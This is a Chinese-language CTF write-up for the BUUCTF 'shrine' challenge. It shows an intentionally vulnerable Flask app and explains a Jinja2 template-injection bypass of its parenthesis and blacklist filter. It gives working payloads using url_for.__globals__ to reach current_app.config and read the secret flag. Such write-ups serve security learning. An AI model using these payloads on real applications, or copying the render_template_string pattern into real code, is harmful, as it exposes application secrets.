【BUUCTF】[WesternCTF2018]shrine

源码

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

注意下面这句话，本app的config中可以看到FLAG

app.config['FLAG'] = os.environ.pop('FLAG')

很明显这段代码告诉了我们存在SSTI

@app.route('/shrine/')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))

有过滤，审计一下

		s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

replace将()替换为了空，后面一句话将黑名单的内容设置成了None，防止读取

方法是使用两个python自带的函数来进行注入

url_for

get_flashed_message()

/shrine/{{url_for.__globals__}}

/shrine/{{url_for.__globals__['current_app'].config}}

贴一下对理解题目有帮助的文章
python中下划线的作用
一些魔法函数